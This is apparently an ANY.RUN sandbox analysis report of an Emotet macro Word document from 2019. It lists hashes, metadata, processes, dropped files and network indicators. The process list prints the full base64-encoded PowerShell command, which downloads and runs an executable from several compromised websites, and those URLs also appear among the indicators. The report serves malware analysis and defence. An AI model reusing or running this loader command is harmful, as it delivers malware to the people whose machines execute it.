analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DETAILS-09_18_201947687.doc

Full analysis: https://app.any.run/tasks/f2f751d9-773a-4b6d-ac78-43b423566732
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 18, 2019, 18:23:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Mali, Subject: Suriname, Author: Ellis Pollich, Comments: RAM synthesizing, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:38:00 2019, Last Saved Time/Date: Wed Sep 18 15:38:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

7C802231644DA0E328AE0BD88BBEB104

SHA1:

88F474DB64064BC1C9A7F1983721FA509AD105FB

SHA256:

09940BC30B89D0E269E0B1226E575459018309AF1B612D6F6FBE3F6DEA40B5CF

SSDEEP:

6144:TNyxNRIIt1POT3XtwNJ6mdxPLkIZ7NSU4jJntATfDCGPy4sSKc:TNyxNRIIt1POT3XtwNJ6mdRXZ7NSU4VC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3720)
    • Creates files in the user directory

      • powershell.exe (PID: 3720)
    • PowerShell script executed

      • powershell.exe (PID: 3720)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3596)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3596)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3720)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Mali
Subject: Suriname
Author: Ellis Pollich
Keywords: -
Comments: RAM synthesizing
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:18 14:38:00
ModifyDate: 2019:09:18 14:38:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Gerlach - Wyman
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Medhurst
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3596"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\DETAILS-09_18_201947687.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3720powershell -encod JAB6AEcASgA0AG4ASgA9ACcAbAB2ADMAdwBLADkAMQA3ACcAOwAkAEwASgB1AEYAcgAzACAAPQAgACcAOAAzADUAJwA7ACQAVQBQAEsAcgB3AGEAUAA9ACcAcQBiAG8AYwBPAFMAQwAnADsAJAByAHIANQBLAFIAdQB3ADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASgB1AEYAcgAzACsAJwAuAGUAeABlACcAOwAkAHoARQB1AEQAaQBCAEIAMAA9ACcATgBVAHoAUABvAGIAQgBCACcAOwAkAFgAdABfAE0AdwBxAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMATABJAGUATgB0ADsAJABkAGoANgBkAG0AcgA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGgAdgB1AG8AbgBnAG0AZQBkAGkAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgAyAGsAZQBlAHAANwAvAEAAaAB0AHQAcABzADoALwAvAG0AbgBwAGEAcwBhAGwAdQBiAG8AbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHMAbQB6ADkAYQB6ADAAMwAyAC8AQABoAHQAdABwADoALwAvAHQAcgB1AG4AZwBhAG4AaAAuAHgAeQB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAegBxADUAMAAvAEAAaAB0AHQAcABzADoALwAvAGkAcAB0AGkAdgBpAGMAaQBuAGkALgBjAG8AbQAvAG4AcABrAHgALwBqAHcAcAB5ADkAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAGUAegBhAGUAdgBpAG4AZQBnAG8AbgBkAGUAcgAuAGMAbwBtAC8AYwBvAG4AZgAvAGYAZAA0ADUALwAnAC4AIgBTAHAAbABgAEkAVAAiACgAJwBAACcAKQA7ACQAVABkAFgAbgBpADAAUgA9ACcAZAA0ADcAaQBNADQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbwBqAGoAVQBUAG8AagBCACAAaQBuACAAJABkAGoANgBkAG0AcgApAHsAdAByAHkAewAkAFgAdABfAE0AdwBxAC4AIgBkAG8AdwBOAEwAYABPAEEAYABEAGYAYABpAEwARQAiACgAJABvAGoAagBVAFQAbwBqAEIALAAgACQAcgByADUASwBSAHUAdwAxACkAOwAkAG4ASgBxAHcAOABYAFEAPQAnAEoAQQBBAE4AUQBPADMAVwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHIAcgA1AEsAUgB1AHcAMQApAC4AIgBMAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAOQA4ADAANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJAByAHIANQBLAFIAdQB3ADEAKQA7ACQAZABmAHYANQBqADUAPQAnAG8AbgBYAHAAdgBxACcAOwBiAHIAZQBhAGsAOwAkAGwAagBqAEEAWABMADAAPQAnAFUAVwBtAHIAcgAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGkAdwBRAFkAdwBQAD0AJwB3AGgAWAB6AFYAUABpACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 674
Read events
2 195
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
45

Dropped files

PID
Process
Filename
Type
3596WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9AAE.tmp.cvr
MD5:
SHA256:
3596WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:522F9FCDD3F7AEB2756E49CD1D20D371
SHA256:56BF7AF8C872C7635DA09374BF1444B76D243245F56266E1756EF00BEEFCDDD9
3596WINWORD.EXEC:\Users\admin\Downloads\~$TAILS-09_18_201947687.docpgc
MD5:737FE518E14DBC011FB659DCCFC963E5
SHA256:953B08E92F275A339AC49CC3597F1123C81C248C6A91E76524E5428448F2F4DF
3596WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D010B457.wmfwmf
MD5:D77CF592F6C204306E8F8F40493ECFB7
SHA256:63C5893B24A50DCED60B8688F1E99743A4D2C9E1038A96332E1AA8946416C228
3596WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEEA7393.wmfwmf
MD5:804558E808CD9EB6D1F62B19BE7BE0D0
SHA256:3CBAE869DA3E29E72764EADE8DF0C0BC0B6C4154FD8A446B5284C2A50F829AFC
3596WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D532D26C.wmfwmf
MD5:01919F45764FBE382D9043FFC1338F7E
SHA256:6EA3DDC3B7200A1BA4911EB219A50AEB1A5182D599197B30AB87339FEB291D88
3596WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA18562E.wmfwmf
MD5:8E6DEF5B61985AAA923C8E4E256082EC
SHA256:D54FC5860A92CD9FEDF3A1A3A83876C60EF282C3729C5625FC97BDEAA52452EC
3596WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52EE6320.wmfwmf
MD5:4F9623B6E4D73C98B6EE1D305B894DF0
SHA256:E01D16C354DA14EF703AC03757CA38E974A5AA6A89D36D8F4FD9A03C2D05FFF5
3596WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB485075.wmfwmf
MD5:7CDFF40133F87EFF2ABA56AA8B00A207
SHA256:196872AF9B6519E65E54B4F06FE6230DB22D196AAAF3B6FCDD71FA580309537A
3596WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7908619.wmfwmf
MD5:C188387CA4B657A069AE0803259F4E16
SHA256:520667EAEF50E311DCF58569F796621309942C4085C0F36A69B4973FB4BA3433
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3720
powershell.exe
GET
404
124.158.6.218:80
http://thinhvuongmedia.com/wp-admin/n2keep7/
VN
xml
345 b
suspicious
3720
powershell.exe
GET
404
104.28.5.162:80
http://trunganh.xyz/wp-content/uzq50/
US
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3720
powershell.exe
104.27.133.144:443
mnpasalubong.com
Cloudflare Inc
US
shared
3720
powershell.exe
124.158.6.218:80
thinhvuongmedia.com
CMC Telecommunications Services Company
VN
suspicious
3720
powershell.exe
212.47.241.236:443
www.cezaevinegonder.com
Online S.a.s.
FR
unknown
3720
powershell.exe
104.28.5.162:80
trunganh.xyz
Cloudflare Inc
US
shared
3720
powershell.exe
31.210.70.130:443
iptivicini.com
Radore Veri Merkezi Hizmetleri A.S.
TR
unknown

DNS requests

Domain
IP
Reputation
thinhvuongmedia.com
  • 124.158.6.218
suspicious
mnpasalubong.com
  • 104.27.133.144
  • 104.27.132.144
unknown
trunganh.xyz
  • 104.28.5.162
  • 104.28.4.162
suspicious
iptivicini.com
  • 31.210.70.130
unknown
www.cezaevinegonder.com
  • 212.47.241.236
unknown

Threats

PID
Process
Class
Message
3720
powershell.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
No debug info